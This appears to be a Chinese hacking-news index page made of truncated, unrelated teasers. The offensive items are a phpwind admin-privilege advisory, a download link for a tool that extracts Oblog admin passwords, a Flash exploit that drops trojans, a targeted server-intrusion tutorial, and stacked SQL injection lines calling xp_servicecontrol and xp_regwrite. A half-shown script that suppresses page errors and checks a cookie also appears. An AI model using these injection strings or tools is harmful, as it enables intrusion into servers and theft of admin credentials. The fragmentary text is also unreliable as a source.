漏洞发布：http://www.80sec.com/

漏洞作者：jianxin@80sec.com

漏洞厂商： http://www.phpwind.com/  本漏洞影响phpwind所有版本

漏洞危害：高

漏洞说明：phpwind是国内使用非常广泛的一款程序，由于在程序设计上存在错误，导致任何人可以取得前台管理员及斑主权限，做删除帖子等任意操作

利用方式：http://www.80sec.co

[阅读全文]

<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1){
var expires=new Date();
exp

[阅读全文]

这个软件你需要输入对方的博客地址就行，能爆出他的管理员密码,
前提是对方是Oblog,如果打了补丁也是不行的

 


下载地址:
http://download.77169.com/soft/hacrktools/attack/200805/20080529oblogoabmm.zip

[阅读全文]

[阅读全文]

新闻来源:cbmland.com
今天取到了一份swf格式的exploits，测试了一下在Flash Player 9 .0.115的结果。
Adobe Flash Player 9 .0.115 在播放恶意构造的swf时，会自动下载一个可执行文件并执行，而我拿到的这个swf文件会自动下载一个downloader并运行，然后再由这个downloader下载其他预先指定的木马程序，相当的危险。

这个漏

[阅读全文]

安装本更新程序可以解决在运行 Windows XP Service Pack 3 的系统上连接/断开连接或禁用/启用网络适配器之后,客户端无法解析 DNS 的问题.
安装本更新程序之后,可能必须重新启动计算机.

快速详细信息

文件名：	WindowsXP-KB951830-x86-CHS.exe
版本：	951830
知识库 (KB) 文章：	KB951830
发布日期：	2008/5/26
语言：	简体中文
下载大小：

[阅读全文]

AVG Anti-Virus System功能上相当完整，可即时对任何存取文件侦测，防止电脑病毒感染；可对电子邮件和附加文件进行扫瞄，防止电脑病毒透过电子邮件和附加文件传播；『病毒资料库』里面则记录了一些电脑病毒的特性和发作**期等相关资讯；『开机保护』可在电脑开机时侦测开机型病毒，防止开机型病毒感染。

* 100%病毒侦测 因为它对"野生"病毒的优秀侦查，AVG的扫描引擎屡获

[阅读全文]

文章来源:网络
很多网上安全教程都介绍了如何通过百度和GOOGLE来搜索漏洞代码而发动攻击，这种文章在实际应用中没有什么价值，
毕竟很多时候我们需要定点定位攻击目标服务器而不是这种广撒网覆盖形式的入侵。
只有学会针对某定点服务器进行扫描和攻击才有利于我们增长企业安全防范与攻击技术，
今天笔者就从实际出发带领各位IT168读者学习针对某固定服务器的扫描入侵一条龙操作，让读者对攻击与防御有一个零距离的

[阅读全文]

试在NB里面恢复CMDSHELL、OACREAT都没有成功，所以开启SQLSERVERAGENT

;exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';--

　　还是没有成功，无奈之中希望寄托于沙盒模式，执行如下语句开启沙盒模式

;execmaster..xp_regwrite 'HKEY_L

[阅读全文]